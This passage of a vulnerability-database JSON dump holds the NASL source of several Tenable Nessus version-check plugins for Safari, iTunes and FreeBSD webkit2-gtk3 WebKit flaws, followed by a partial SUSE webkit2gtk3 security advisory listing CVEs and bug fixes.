script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X or macOS\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11|12|13)([^0-9]|$)\", string:os))\n{\n audit(AUDIT_OS_NOT, \"Mac OS X El Capitan 10.11 / macOS Sierra 10.12 / macOS High Sierra 10.13\");\n} \n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"11.0.3\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:10:25", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.3. It is, therefore, affected by multiple vulnerabilities in webkit as referenced in the HT208474 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-26T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (credentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4088", "CVE-2018-4096"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_3.NASL", "href": "https://www.tenable.com/plugins/nessus/106397", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106397);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4088\", \"CVE-2018-4096\");\n script_bugtraq_id(102775);\n\n script_name(english:\"Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (credentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.3. It is, therefore, affected by multiple vulnerabilities \nin webkit as referenced in the HT208474 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208474\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_detect.nasl\");\n script_require_keys(\"installed_sw/iTunes Version\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\n# Ensure this is Windows\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\napp_info = vcf::get_app_info(app:\"iTunes Version\", win_local:TRUE);\n\nconstraints = [{\"fixed_version\" : \"12.7.3\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:11:40", "description": "The version of Apple iTunes installed on the remote Windows host is prior to 12.7.3. It is, therefore, affected by multiple vulnerabilities in webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-26T00:00:00", "type": "nessus", "title": "Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (uncredentialed check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4088", "CVE-2018-4096"], "modified": "2019-11-08T00:00:00", "cpe": ["cpe:/a:apple:itunes"], "id": "ITUNES_12_7_3_BANNER.NASL", "href": "https://www.tenable.com/plugins/nessus/106398", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106398);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-4088\", \"CVE-2018-4096\");\n script_bugtraq_id(102775);\n\n script_name(english:\"Apple iTunes < 12.7.3 WebKit Multiple Vulnerabilities (uncredentialed check)\");\n script_summary(english:\"Checks the version of iTunes on Windows.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple iTunes installed on the remote Windows host is\nprior to 12.7.3. It is, therefore, affected by multiple vulnerabilities\nin webkit as referenced in the HT208326 advisory.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208474\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple iTunes version 12.7.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4096\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:itunes\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Peer-To-Peer File Sharing\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"itunes_sharing.nasl\");\n script_require_keys(\"iTunes/sharing\");\n script_require_ports(\"Services/www\", 3689);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:3689, embedded:TRUE, ignore_broken:TRUE);\n\nget_kb_item_or_exit(\"iTunes/\" + port + \"/enabled\");\n\ntype = get_kb_item_or_exit(\"iTunes/\" + port + \"/type\");\nsource = get_kb_item_or_exit(\"iTunes/\" + port + \"/source\");\nversion = get_kb_item_or_exit(\"iTunes/\" + port + \"/version\");\n\nif (type != 'Windows') audit(AUDIT_OS_NOT, \"Windows\");\n\nfixed_version = \"12.7.3\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n report = '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"iTunes\", port, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-16T16:17:19", "description": "The WebKit team reports many vulnerabilities.\n\nPlease reference the CVE/URL list for details.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-03-29T00:00:00", "type": "nessus", "title": "FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (1ce95bc7-3278-11e8-b527-00012e582166) (Spectre)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13783", "CVE-2017-13784", "CVE-2017-13785", "CVE-2017-13788", "CVE-2017-13791", "CVE-2017-13792", "CVE-2017-13794", "CVE-2017-13795", "CVE-2017-13796", "CVE-2017-13798", "CVE-2017-13802", "CVE-2017-13803", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-5715", "CVE-2017-5753", "CVE-2017-7087", "CVE-2017-7089", "CVE-2017-7090", "CVE-2017-7091", "CVE-2017-7092", "CVE-2017-7093", "CVE-2017-7095", "CVE-2017-7096", "CVE-2017-7098", "CVE-2017-7100", "CVE-2017-7102", "CVE-2017-7104", "CVE-2017-7107", "CVE-2017-7109", "CVE-2017-7111", "CVE-2017-7117", "CVE-2017-7120", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-4088", "CVE-2018-4089", "CVE-2018-4096"], "modified": "2019-07-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:webkit2-gtk3", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_1CE95BC7327811E8B52700012E582166.NASL", "href": "https://www.tenable.com/plugins/nessus/108703", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108703);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/07/10 16:04:13\");\n\n script_cve_id(\"CVE-2017-13783\", \"CVE-2017-13784\", \"CVE-2017-13785\", \"CVE-2017-13788\", \"CVE-2017-13791\", \"CVE-2017-13792\", \"CVE-2017-13794\", \"CVE-2017-13795\", \"CVE-2017-13796\", \"CVE-2017-13798\", \"CVE-2017-13802\", \"CVE-2017-13803\", \"CVE-2017-13856\", \"CVE-2017-13866\", \"CVE-2017-13870\", \"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2017-7087\", \"CVE-2017-7089\", \"CVE-2017-7090\", \"CVE-2017-7091\", \"CVE-2017-7092\", \"CVE-2017-7093\", \"CVE-2017-7095\", \"CVE-2017-7096\", \"CVE-2017-7098\", \"CVE-2017-7100\", \"CVE-2017-7102\", \"CVE-2017-7104\", \"CVE-2017-7107\", \"CVE-2017-7109\", \"CVE-2017-7111\", \"CVE-2017-7117\", \"CVE-2017-7120\", \"CVE-2017-7153\", \"CVE-2017-7156\", \"CVE-2017-7157\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-4088\", \"CVE-2018-4089\", \"CVE-2018-4096\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"FreeBSD : webkit2-gtk3 -- multiple vulnerabilities (1ce95bc7-3278-11e8-b527-00012e582166) (Spectre)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The WebKit team reports many vulnerabilities.\n\nPlease reference the CVE/URL list for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0008.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2017-0010.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://webkitgtk.org/security/WSA-2018-0002.html\"\n );\n # https://vuxml.freebsd.org/freebsd/1ce95bc7-3278-11e8-b527-00012e582166.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2cac8e99\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:webkit2-gtk3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"webkit2-gtk3>=2.16.6<2.20.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:56:07", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\nCVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs (boo#1101999)\n\nCVE-2017-13884: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-13885: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7153: An unspecified issue allowed remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted website that sends a 401 Unauthorized redirect (bsc#1077535).\n\nCVE-2017-7160: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7161: An unspecified issue allowed remote attackers to execute arbitrary code via special characters that trigger command injection (bsc#1075775, bsc#1077535).\n\nCVE-2017-7165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4088: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4096: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4200: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers a WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\nCVE-2018-4204: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092279).\n\nCVE-2018-4101: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit' component allowed attackers to trigger an assertion failure by leveraging improper array indexing (bsc#1088182)\n\nCVE-2018-4114: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4117: An unspecified issue allowed remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted website (bsc#1088182, bsc#1102530).\n\nCVE-2018-4118: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4119: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4120: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4121: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1092278).\n\nCVE-2018-4122: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4125: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4127: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4128: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4129: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4146: An unspecified issue allowed attackers to cause a denial of service (memory corruption) via a crafted website (bsc#1088182).\n\nCVE-2018-4161: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4162: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4163: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4190: An unspecified issue allowed remote attackers to obtain sensitive credential information that is transmitted during a CSS mask-image fetch (bsc#1097693)\n\nCVE-2018-4199: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4218: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website that triggers an @generatorState use-after-free (bsc#1097693)\n\nCVE-2018-4222: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages a getWasmBufferFromValue out-of-bounds read during WebAssembly compilation (bsc#1097693)\n\nCVE-2018-4232: An unspecified issue allowed remote attackers to overwrite cookies via a crafted website (bsc#1097693)\n\nCVE-2018-4233: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4246: An unspecified issue allowed remote attackers to execute arbitrary code via a crafted website that leverages type confusion (bsc#1104169)\n\nCVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL, leading to an application crash (bsc#1095611)\n\nCVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed remote attackers to inject arbitrary web script or HTML via a crafted URL (bsc#1088182).\n\nCVE-2018-11713: The libsoup network backend of WebKit unexpectedly failed to use system proxy settings for WebSocket connections. As a result, users could be deanonymized by crafted websites via a WebSocket connection (bsc#1096060).\n\nCVE-2018-11712: The libsoup network backend of WebKit failed to perform TLS certificate verification for WebSocket connections (bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues: Fixed a crash when atk_object_ref_state_set is called on an AtkObject that's being destroyed (bsc#1088932).\n\nFixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\nDisable Gigacage if mmap fails to allocate in Linux.\n\nAdd user agent quirk for paypal website.\n\nProperly detect compiler flags, needed libs, and fallbacks for usage of 64-bit atomic operations.\n\nFix a network process crash when trying to get cookies of about:blank page.\n\nFix UI process crash when closing the window under Wayland.\n\nFix several crashes and rendering issues.\n\nDo TLS error checking on GTlsConnection::accept-certificate to finish the load earlier in case of errors.\n\nProperly close the connection to the nested wayland compositor in the Web Process.\n\nAvoid painting backing stores for zero-opacity layers.\n\nFix downloads started by context menu failing in some websites due to missing user agent HTTP header.\n\nFix video unpause when GStreamerGL is disabled.\n\nFix several GObject introspection annotations.\n\nUpdate user agent quiks to fix Outlook.com and Chase.com.\n\nFix several crashes and rendering issues.\n\nImprove error message when Gigacage cannot allocate virtual memory.\n\nAdd missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\nImprove web process memory monitor thresholds.\n\nFix a web process crash when the web view is created and destroyed quickly.\n\nFix a network process crash when load is cancelled while searching for stored HTTP auth credentials.\n\nFix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are disabled.\n\nNew API to retrieve and delete cookies with WebKitCookieManager.\n\nNew web process API to detect when form is submitted via JavaScript.\n\nSeveral improvements and fixes in the touch/gestures support.\n\nSupport for the “systemâ 28; CSS font family.\n\nComplex text rendering improvements and fixes.\n\nMore complete and spec compliant WebDriver implementation.\n\nEnsure DNS prefetching cannot be re-enabled if disabled by settings.\n\nFix seek sometimes not working.\n\nFix rendering of emojis that were using the wrong scale factor in some cases.\n\nFix rendering of combining enclosed keycap.\n\nFix rendering scale of some layers in HiDPI.\n\nFix a crash in Wayland when closing the web view.\n\nFix crashes upower crashes when running inside a chroot or on systems with broken dbus/upower.\n\nFix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\nFix several crashes and rendering issues.\n\nAdd ENABLE_ADDRESS_SANITIZER to make it easier to build with asan support.\n\nFix a crash a under Wayland when using mesa software rasterization.\n\nMake fullscreen video work again.\n\nFix handling of missing GStreamer elements.\n\nFix rendering when webm video is played twice.\n\nFix kinetic scrolling sometimes jumping around.\n\nFix build with ICU configured without collation support.\n\nWebSockets use system proxy settings now (requires libsoup 2.61.90).\n\nShow the context menu on long-press gesture.\n\nAdd support for Shift + mouse scroll to scroll horizontally.\n\nFix zoom gesture to actually zoom instead of changing the page scale.\n\nImplement support for Graphics ARIA roles.\n\nMake sleep inhibitors work under Flatpak.\n\nAdd get element CSS value command to WebDriver.\n\nFix a crash aftter a swipe gesture.\n\nFix several crashes and rendering issues.\n\nFix crashes due to duplicated symbols in libjavascriptcoregtk and libwebkit2gtk.\n\nFix parsing of timeout values in WebDriver.\n\nImplement get timeouts command in WebDriver.\n\nFix deadlock in GStreamer video sink during shutdown when accelerated compositing is disabled.\n\nFix several crashes and rendering issues.\n\nAdd web process API to detect when form is submitted via JavaScript.\n\nAdd new API to replace webkit_form_submission_request_get_text_fields() that is now deprecated.\n\nAdd WebKitWebView::web-process-terminated signal and deprecate web-process-crashed.\n\nFix rendering issues when editing text areas.\n\nUse FastMalloc based GstAllocator for GStreamer.\n\nFix web process crash at startup in bmalloc.\n\nFix several memory leaks in GStreamer media backend.\n\nWebKitWebDriver process no longer links to libjavascriptcoregtk.\n\nFix several crashes and rendering issues.\n\nAdd new API to add, retrieve and delete cookies via WebKitCookieManager.\n\nAdd functions to WebSettings to convert font sizes between points and pixels.\n\nEnsure cookie operations take effect when they happen before a web process has been spawned.\n\nAutomatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\nAdd initial resource load statistics support.\n\nAdd API to expose availability of certain editing commands in WebKitEditorState.\n\nAdd API to query whether a WebKitNavigationAction is a redirect or not.\n\nImprove complex text rendering.\n\nAdd support for the 'system' CSS font family.\n\nDisable USE_GSTREAMER_GL\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-25T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2018:3387-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165", "CVE-2018-11646", "CVE-2018-11712", "CVE-2018-11713", "CVE-2018-12911", "CVE-2018-4088", "CVE-2018-4096", "CVE-2018-4101", "CVE-2018-4113", "CVE-2018-4114", "CVE-2018-4117", "CVE-2018-4118", "CVE-2018-4119", "CVE-2018-4120", "CVE-2018-4121", "CVE-2018-4122", "CVE-2018-4125", "CVE-2018-4127", "CVE-2018-4128", "CVE-2018-4129", "CVE-2018-4133", "CVE-2018-4146", "CVE-2018-4161", "CVE-2018-4162", "CVE-2018-4163", "CVE-2018-4165", "CVE-2018-4190", 